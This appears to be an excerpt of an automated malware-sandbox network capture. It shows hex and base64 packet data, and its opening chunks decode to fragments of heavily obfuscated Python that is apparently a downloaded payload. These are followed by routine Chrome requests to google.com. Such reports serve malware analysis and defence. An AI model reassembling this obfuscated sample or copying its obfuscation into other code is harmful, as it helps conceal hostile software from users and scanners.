                                                                                                                                                                                                            Data Ascii: X183NzU4MjEwMTc5NzAzID0gMApfXzc3NTgyMTAxNzk3MDMgKz0gMQp0cnk6CiAgICByYWlzZSBNZW1vcnlFcnJvcihfXzc3NTgyMTAxNzk3MDMpCmV4Y2VwdCBNZW1vcnlFcnJvciBhcyBfXzY3Njk0NjcxODQ4MTM6CiAgICBpZiBfXzY3Njk0NjcxODQ4MTMuYXJnc1swXSA9PSAxOgogICAgICAgIGdsb2JhbHMoKVsnUl9FX0RfX0FfVl9fX19fX18nXSA9IGJvb2wgaWYgYm9vbChib29sKGJvb2woYm9vbCkpKSA8IGJvb2wodHlwZShpbnQoMTMxNykgPiBpbnQoMTQ0KSA8IGludCgxMTEpID4gaW50KDkxNykpKSBhbmQgYm9vbChzdHIoc3RyKDkxOCkgPiBpbnQoNzE5KSA8IGludCg5MTYpID4gaW50KDYxNykpKSA+IDIgZWxzZSBib29sCiAgICBpZiBfXzY3Njk0NjcxODQ4MTMuYXJnc1swXSA9PSAzOgogICAgICAgIF9fNzAwOTUzMjk4MTI4MSA9IDE2NjI0ODcxNDU1MzA4OApfXzcxOTY4NjY1MjU2ODIgPSAwCl9fNzE5Njg2NjUyNTY4MiArPSAxCnRyeToKICAgIHJhaXNlIE1lbW9yeUVycm9yKF9fNzE5Njg2NjUyNTY4MikKZXhjZXB0IE1lbW9yeUVycm9yIGFzIF9fMzA0NjgyMjA2NTQ0OToKICAgIGlmIF9fMzA0NjgyMjA2NTQ0OS5hcmdzWzBdID09IDE6CiAgICAgICAgZ2xvYmFscygpWydSX0VfRF9fQV9WX19fX19fJ10gPSBzdHIgaWYgYm9vbChib29sKGJvb2woc3RyKSkpIDwgYm9vbCh0eXBlKGludCgxNjQpID4gaW50KDE3OCkgPCBpbnQoMjQpID4gaW50KDE0MTUpKSkgYW5kIGJvb2woc3RyK
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638528109 CET1236INData Raw: 48 4e 30 63 69 67 78 4e 7a 67 70 49 44 34 67 61 57 35 30 4b 44 45 31 4d 54 4d 70 49 44 77 67 61 57 35 30 4b 44 45 35 4e 69 6b 67 50 69 42 70 62 6e 51 6f 4e 7a 45 79 4b 53 6b 70 49 44 34 67 4d 69 42 6c 62 48 4e 6c 49 48 4e 30 63 67 6f 67 49 43 41
                                                                                                                                                                                                            Data Ascii: HN0cigxNzgpID4gaW50KDE1MTMpIDwgaW50KDE5NikgPiBpbnQoNzEyKSkpID4gMiBlbHNlIHN0cgogICAgaWYgX18zMDQ2ODIyMDY1NDQ5LmFyZ3NbMF0gPT0gMzoKICAgICAgICBfXzM0MTQxMjk2OTI5MzcgPSA5NjEzNTkxMjk3MTU3NwogICAgaWYgX18zMDQ2ODIyMDY1NDQ5LmFyZ3NbMF0gPT0gNDoKICAgICAgICBf
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638550043 CET1236INData Raw: 7a 30 67 4d 51 70 30 63 6e 6b 36 43 69 41 67 49 43 42 79 59 57 6c 7a 5a 53 42 4e 5a 57 31 76 63 6e 6c 46 63 6e 4a 76 63 69 68 66 58 7a 4d 78 4d 54 45 31 4e 44 55 31 4e 7a 51 31 4e 44 41 70 43 6d 56 34 59 32 56 77 64 43 42 4e 5a 57 31 76 63 6e 6c
                                                                                                                                                                                                            Data Ascii: z0gMQp0cnk6CiAgICByYWlzZSBNZW1vcnlFcnJvcihfXzMxMTE1NDU1NzQ1NDApCmV4Y2VwdCBNZW1vcnlFcnJvciBhcyBfXzc0MzU1MDQ5MzUwMzU6CiAgICBpZiBfXzc0MzU1MDQ5MzUwMzUuYXJnc1swXSA9PSAxOgogICAgICAgIGdsb2JhbHMoKVsnUl9FX0RfX0FfVl9fX19fJ10gPSBpbnQgaWYgYm9vbChib29sKGJv
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638565063 CET1236INData Raw: 43 42 70 5a 69 42 66 58 7a 63 30 4f 54 67 7a 4e 54 49 78 4e 6a 63 30 4f 54 49 75 59 58 4a 6e 63 31 73 77 58 53 41 39 50 53 41 31 4f 67 6f 67 49 43 41 67 49 43 41 67 49 46 39 66 4f 44 41 34 4d 7a 49 7a 4d 54 59 7a 4f 44 4d 79 4e 53 41 39 49 44 6b
                                                                                                                                                                                                            Data Ascii: CBpZiBfXzc0OTgzNTIxNjc0OTIuYXJnc1swXSA9PSA1OgogICAgICAgIF9fODA4MzIzMTYzODMyNSA9IDkyODY3NDM4MzI3MTQxCl9fODYzNjc3MzU0ODE0MSA9IDAKX184NjM2NzczNTQ4MTQxICs9IDEKdHJ5OgogICAgcmFpc2UgTWVtb3J5RXJyb3IoX184NjM2NzczNTQ4MTQxKQpleGNlcHQgTWVtb3J5RXJyb3IgYXMg
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638581038 CET1236INData Raw: 47 39 69 59 57 78 7a 4b 43 6c 62 4a 31 4a 66 52 56 39 45 58 31 39 42 58 31 5a 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 38 6e 58 53 41 39 49 47 4e 68 62 47 78 68 59 6d 78 6c 49 47 6c 6d 49 47 4a 76 62 32 77 6f 59 6d 39 76 62 43 68 69 62 32 39
                                                                                                                                                                                                            Data Ascii: G9iYWxzKClbJ1JfRV9EX19BX1ZfX19fX19fX19fX18nXSA9IGNhbGxhYmxlIGlmIGJvb2woYm9vbChib29sKGNhbGxhYmxlKSkpIDwgYm9vbCh0eXBlKGludCg4MSkgPiBpbnQoMTEzKSA8IGludCgxNjcpID4gaW50KDU0KSkpIGFuZCBib29sKHN0cihzdHIoMTExOCkgPiBpbnQoMTk5KSA8IGludCgxOTE4KSA+IGludCgx
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638595104 CET1236INData Raw: 43 42 79 59 57 6c 7a 5a 53 42 4e 5a 57 31 76 63 6e 6c 46 63 6e 4a 76 63 69 68 66 58 7a 59 77 4e 7a 51 33 4e 6a 41 30 4d 54 63 7a 4f 44 41 70 43 6d 56 34 59 32 56 77 64 43 42 4e 5a 57 31 76 63 6e 6c 46 63 6e 4a 76 63 69 42 68 63 79 42 66 58 7a 55
                                                                                                                                                                                                            Data Ascii: CByYWlzZSBNZW1vcnlFcnJvcihfXzYwNzQ3NjA0MTczODApCmV4Y2VwdCBNZW1vcnlFcnJvciBhcyBfXzUwMTg3MzY1NzUxOTI6CiAgICBpZiBfXzUwMTg3MzY1NzUxOTIuYXJnc1swXSA9PSAxOgogICAgICAgIGdsb2JhbHMoKVsnX19fX19fX19fX19fX19SX0VfRF9fQV9WX19fX19fX19fX19fX18nXSA9IGxpc3QgaWYg
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638614893 CET1236INData Raw: 7a 55 34 4d 44 67 7a 4d 44 49 32 43 69 41 67 49 43 42 70 5a 69 42 66 58 7a 4d 33 4e 44 59 77 4e 7a 6b 77 4d 7a 45 34 4f 44 4d 75 59 58 4a 6e 63 31 73 77 58 53 41 39 50 53 41 30 4f 67 6f 67 49 43 41 67 49 43 41 67 49 46 39 66 4d 6a 63 33 4f 54 4d
                                                                                                                                                                                                            Data Ascii: zU4MDgzMDI2CiAgICBpZiBfXzM3NDYwNzkwMzE4ODMuYXJnc1swXSA9PSA0OgogICAgICAgIF9fMjc3OTM2NzgwMTg4OSA9IDIwMTg4Mjg0NjQwODIzCiAgICBpZiBfXzM3NDYwNzkwMzE4ODMuYXJnc1swXSA9PSA1OgogICAgICAgIF9fNTM0MTI4NzM0MDc4MyA9IDExMjE4MTIzMjUyMzI5CiAgICBpZiBfXzM3NDYwNzkw
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638634920 CET36INData Raw: 33 4e 62 4d 46 30 67 50 54 30 67 4d 54 6f 4b 49 43 41 67 49 43 41 67 49 43 42 6e 62 47 39 69 59 57 78 7a 4b
                                                                                                                                                                                                            Data Ascii: 3NbMF0gPT0gMToKICAgICAgICBnbG9iYWxzK
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638648987 CET1236INData Raw: 43 6c 62 4a 33 52 79 65 65 47 46 6f 43 64 64 49 44 30 67 63 48 4a 70 62 6e 51 67 61 57 59 67 59 6d 39 76 62 43 68 69 62 32 39 73 4b 47 4a 76 62 32 77 6f 63 48 4a 70 62 6e 51 70 4b 53 6b 67 50 43 42 69 62 32 39 73 4b 48 52 35 63 47 55 6f 61 57 35
                                                                                                                                                                                                            Data Ascii: ClbJ3RyeeGFoCddID0gcHJpbnQgaWYgYm9vbChib29sKGJvb2wocHJpbnQpKSkgPCBib29sKHR5cGUoaW50KDIxMykgPiBpbnQoNzE4KSA8IGludCg3NCkgPiBpbnQoMTIxNykpKSBhbmQgYm9vbChzdHIoc3RyKDE3MTQpID4gaW50KDE4MTQpIDwgaW50KDkxMSkgPiBpbnQoOTE0KSkpID4gMiBlbHNlIHByaW50CiAgICBp
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638665915 CET1236INData Raw: 47 6c 6d 49 46 39 66 4d 6a 55 34 4e 54 59 31 4d 44 4d 78 4e 7a 4d 79 4d 53 35 68 63 6d 64 7a 57 7a 42 64 49 44 30 39 49 44 55 36 43 69 41 67 49 43 41 67 49 43 41 67 58 31 38 32 4d 44 4d 30 4e 44 49 35 4e 54 63 7a 4f 44 4d 35 49 44 30 67 4d 54 49
                                                                                                                                                                                                            Data Ascii: GlmIF9fMjU4NTY1MDMxNzMyMS5hcmdzWzBdID09IDU6CiAgICAgICAgX182MDM0NDI5NTczODM5ID0gMTIwNjkwMzY0ODY0OTU0CgpkZWYgUl9FX0RfX0FfVl9fX18oUkVEX0RFRkVOREVSLCAqayk6CiAgICBfXzgyNDY2MjA1NTI2ODkgPSAwCiAgICBfXzgyNDY2MjA1NTI2ODkgKz0gMQogICAgdHJ5OgogICAgICAgIHJh
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.643623114 CET1236INData Raw: 54 67 32 4e 54 63 75 59 58 4a 6e 63 31 73 77 58 53 41 39 50 53 41 78 4f 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6d 62 33 49 67 5a 32 78 76 59 6d 46 73 63 79 67 70 57 79 64 53 58 30 56 66 52 46 39 66 58 31 39 42 58 31 5a 66 4a 31 30
                                                                                                                                                                                                            Data Ascii: Tg2NTcuYXJnc1swXSA9PSAxOgogICAgICAgICAgICBmb3IgZ2xvYmFscygpWydSX0VfRF9fX19BX1ZfJ10gaW4gZ2xvYmFscygpWydSRURfREVGRU5ERVInXToKICAgICAgICAgICAgICAgIGlmIG5vdCBfNDE4OgogICAgICAgICAgICAgICAgICAgIGdsb2JhbHMoKVsnUl9FX0RfX19fQV9WXyddICs9IChsYW1iZGEgOiAn


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.450026142.250.184.2284433320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:27:04 GMT
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-iKEP_n55HHsOgBe5AJxl6g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC112INData Raw: 31 30 36 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 74 74 65 6c 20 77 69 63 6b 65 64 20 64 6f 6c 6c 73 22 2c 22 61 6d 64 20 72 79 7a 65 6e 20 39 38 30 30 78 33 64 22 2c 22 66 61 6d 69 6c 79 20 64 6f 6c 6c 61 72 20 73 74 6f 72 65 73 20 63 6c 6f 73 69 6e 67 22 2c 22 70 69 74 74 73 62 75 72 67 68 20 73 74 65 65 6c 65 72 73 22 2c 22
                                                                                                                                                                                                            Data Ascii: 1065)]}'["",["mattel wicked dolls","amd ryzen 9800x3d","family dollar stores closing","pittsburgh steelers","
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC1378INData Raw: 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 66 6f 72 65 63 61 73 74 22 2c 22 73 61 75 64 69 20 61 72 61 62 69 61 6e 20 64 65 73 65 72 74 20 73 6e 6f 77 66 61 6c 6c 22 2c 22 62 72 69 64 67 65 74 20 6a 6f 6e 65 73 20 64 69 61 72 79 20 74 72 61 69 6c 65 72 22 2c 22 63 6f 64 20 77 61 72 7a 6f 6e 65 20 62 6c 61 63 6b 20 6f 70 73 20 36 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56
                                                                                                                                                                                                            Data Ascii: aurora borealis northern lights forecast","saudi arabian desert snowfall","bridget user diary trailer","cod warzone black ops 6"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2V
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC1378INData Raw: 5a 33 57 46 64 58 51 32 46 6c 63 6b 68 4f 62 6d 46 70 54 6d 56 50 64 58 49 78 55 6b 4a 57 53 30 4e 6c 63 58 4e 35 63 33 4e 4c 4d 45 6c 71 4c 31 70 32 57 57 64 70 56 6e 64 7a 51 56 4a 53 56 6b 34 72 55 57 74 42 54 30 74 69 64 48 64 50 52 54 63 31 4d 6b 70 51 57 55 64 46 62 32 31 4d 52 57 52 76 53 31 5a 7a 64 58 46 32 53 46 67 76 53 44 4d 30 5a 47 74 75 64 46 6f 7a 54 45 64 36 64 32 68 47 56 31 64 71 61 55 31 6e 4d 53 74 4c 64 6d 34 35 4e 46 42 6c 62 33 70 4e 62 7a 6c 50 59 55 5a 78 52 30 31 57 59 55 45 34 62 32 74 45 52 6d 64 4b 55 47 49 7a 62 55 4a 6e 4f 58 46 77 61 30 52 7a 4e 58 56 71 64 31 56 71 62 55 46 79 57 55 45 79 63 54 6c 53 53 54 56 32 65 6e 46 76 55 30 4a 72 5a 6b 6c 70 61 6e 55 79 53 47 46 72 56 6b 77 34 65 48 68 44 53 55 46 72 4d 47 6c 74 56
                                                                                                                                                                                                            Data Ascii: Z3WFdXQ2FlckhObmFpTmVPdXIxUkJWS0NlcXN5c3NLMElqL1p2WWdpVndzQVJSVk4rUWtBT0tidHdPRTc1MkpQWUdFb21MRWRvS1ZzdXF2SFgvSDM0ZGtudFozTEd6d2hGV1dqaU1nMStLdm45NFBlb3pNbzlPYUZxR01WYUE4b2tERmdKUGIzbUJnOXFwa0RzNXVqd1VqbUFyWUEycTlSSTV2enFvU0JrZklpanUySGFrVkw4eHhDSUFrMGltV
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC1337INData Raw: 59 57 31 69 54 6b 56 4c 4d 32 55 79 4b 7a 46 71 62 46 6c 6d 4f 57 70 4d 55 47 64 35 53 79 39 76 61 45 6c 46 53 48 4a 55 64 54 46 32 4d 79 38 31 65 6d 64 53 4e 7a 5a 4a 61 44 64 47 59 32 74 47 52 56 49 78 52 54 59 31 62 6c 5a 30 5a 46 64 5a 51 55 31 70 57 58 5a 48 62 57 49 34 5a 30 39 72 51 57 78 4c 64 44 4e 47 4e 48 4a 56 62 7a 5a 6c 56 48 6f 34 55 48 4e 30 5a 48 64 68 4c 30 68 4d 5a 47 78 73 56 53 38 33 52 57 74 7a 51 6b 74 35 65 58 5a 45 53 6e 4a 53 62 30 51 34 61 48 67 79 55 44 4e 45 55 7a 42 31 57 6c 70 42 57 56 64 79 53 45 64 69 61 48 6c 49 4e 32 77 31 55 6c 42 78 52 54 4e 4b 62 6d 70 51 52 31 6c 6b 65 45 68 46 56 6c 4a 49 53 54 56 73 61 58 55 31 62 32 73 76 57 55 78 44 65 6b 56 71 62 46 4e 31 4d 30 70 72 63 56 56 42 4d 56 4e 32 56 6c 67 78 53 7a 6c
                                                                                                                                                                                                            Data Ascii: YW1iTkVLM2UyKzFqbFlmOWpMUGd5Sy9vaElFSHJUdTF2My81emdSNzZJaDdGY2tGRVIxRTY1blZ0ZFdZQU1pWXZHbWI4Z09rQWxLdDNGNHJVbzZlVHo4UHN0ZHdhL0hMZGxsVS83RWtzQkt5eXZESnJSb0Q4aHgyUDNEUzB1WlpBWVdySEdiaHlIN2w1UlBxRTNKbmpQR1lkeEhFVlJISTVsaXU1b2svWUxDekVqbFN1M0prcVVBMVN2VlgxSzl
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC995INData Raw: 33 64 63 0d 0a 57 57 70 77 52 48 68 58 61 33 46 69 5a 58 46 6e 51 56 5a 57 59 57 55 30 52 6b 64 75 64 6b 39 51 55 6c 46 46 5a 6d 70 34 64 43 74 4a 59 32 64 4c 63 31 52 4a 55 47 4a 6e 56 44 42 4b 4e 54 63 35 56 6d 68 33 4e 45 68 58 53 69 39 44 62 54 52 4f 57 45 68 77 64 32 45 33 4f 55 78 75 51 54 55 76 55 55 49 72 4e 33 70 51 61 56 64 33 4f 48 46 69 55 55 64 53 56 30 46 55 4e 30 56 61 65 55 6c 43 64 57 68 47 64 30 67 31 62 46 42 6e 63 54 68 76 61 32 70 70 64 48 45 72 63 48 6f 72 54 57 74 4d 4d 31 70 4b 4d 33 42 6b 56 44 4e 43 55 6a 56 56 61 6d 70 56 53 6c 56 74 5a 57 74 30 64 58 70 4f 54 7a 64 49 4d 57 35 30 56 58 63 35 4f 48 63 35 4e 6a 56 48 65 48 4e 4e 56 30 4e 44 62 6b 46 6d 52 31 5a 70 61 44 68 32 4d 6e 4e 46 65 56 6c 69 63 6a 56 30 52 47 6f 79 5a 47
                                                                                                                                                                                                            Data Ascii: 3dcWWpwRHhXa3FiZXFnQVZWYWU0Rkdudk9QUlFFZmp4dCtJY2dLc1RJUGJnVDBKNTc5Vmh3NEhXSi9DbTROWEhwd2E3OUxuQTUvUUIrN3pQaVd3OHFiUUdSV0FUN0VaeUlCdWhGd0g1bFBncThva2ppdHErcHorTWtMM1pKM3BkVDNCUjVVampVSlVtZWt0dXpOTzdIMW50VXc5OHc5NjVHeHNNV0NDbkFmR1ZpaDh2MnNFeVlicjV0RGoyZG
                                                                                                                                                                                                            2024-11-13 12:27:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.450027142.250.184.2284433320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 694010790
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:27:05 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC336INData Raw: 32 38 39 38 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                            Data Ascii: 2898)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30
                                                                                                                                                                                                            Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c
